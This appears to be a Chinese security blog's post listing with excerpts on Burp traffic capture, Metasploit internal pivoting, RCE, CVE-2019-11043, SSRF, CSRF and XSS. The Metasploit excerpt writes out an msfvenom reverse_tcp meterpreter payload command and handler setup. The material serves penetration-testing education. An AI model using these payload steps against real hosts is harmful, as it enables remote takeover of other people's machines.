- 博客(12)
- 收藏
- 关注
原创 一次burp无法抓微信PC端小程序的深刻经历以及解决方案
今天想用burp对PC的微信小程序进行渗透测试,发现怎么抓也抓不到,明明之前可以抓的,经过几小时的研究和资料搜集,终于解决。顺手把如何对手机/模拟器进行抓包也写了下,在我会提到是如何解决这个头疼且深刻的问题,这个问题我相信部分师傅应该都会有,希望能帮助到大家。
2022-08-23 01:01:57 7458 3
原创 使用Metasploit进行内网渗透
一、网络拓扑图假如我们拿到了一台主机比如Win2008的shell,如何通过该主机进行内网渗透,拿到比如下图中数据服务器的最高权限?二、Win2008主机上线msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.6 lport=4444 -f exe > /var/www/html/w01ke.exemsfconsoleuse exploit/multi/handlerset payload windows/meterpr
2022-05-07 22:08:02 1731
原创 RCE代码及命令执行漏洞
在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用 代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。同样调用系统命令处理,将造成命令执行漏洞。一、代码执行1、脚本(1)PHP PHP中可以执行代码的函数,常用于编写一句话木马,可能导致代码执行漏洞,这里对代码执行函数做一些归纳。 常见代码执行函数,如eval()、assert()、preg_replace()、create_function
2022-02-13 17:59:17 7093
原创 CVE-2019-11043(PHP远程代码执行漏洞)
一、漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。 向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。 该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下:location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_
2022-02-12 23:35:58 9146 2
原创 SSRF服务器端请求伪造攻击详解
一、SSRF概述 SSRF(Server-Side Request Forgery:服务器端请求伪造),是一种由攻击者构造请求,由服务端发起请求的安全漏洞。 其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据 数据流:攻击者----->服务器----->目标地址 根据后台使用函数的不同,对应的影响和利用方法又有不一样 PHP中下面函数的使用不
2022-02-07 23:16:20 6579
原创 CSRF跨站请求伪造攻击(附自动化工具实战某CMS)
一、CSRF介绍 CSRF全称为跨站请求伪造(Cross-site request forgery),是一种网络攻击方式,也被称为 one-click attack 或者 session riding。通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像xss漏洞,但是它与xss漏洞非常不同。xss利用站点内的信任用户,而CSRF则通过伪装成受信任用户请求受信任的网站。与xss攻击相比,csrf攻击往往不大流行,也难以防范,所以认为比xss漏洞更具危险性二、CSRF漏洞原理 CS
2022-02-02 23:46:18 3089
原创 跨站脚本攻击XSS(最全最细致的靶场实战)
一、XSS跨站漏洞(1)XSS简介 网站中包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting,安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS)有所区分,故称XSS)的威胁,而静态站点则完全不受其影响。恶意攻击者会在 Web页面里插入恶意Script代码,当用户浏览该页之时,嵌.
2022-01-31 13:51:06 40907 15
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人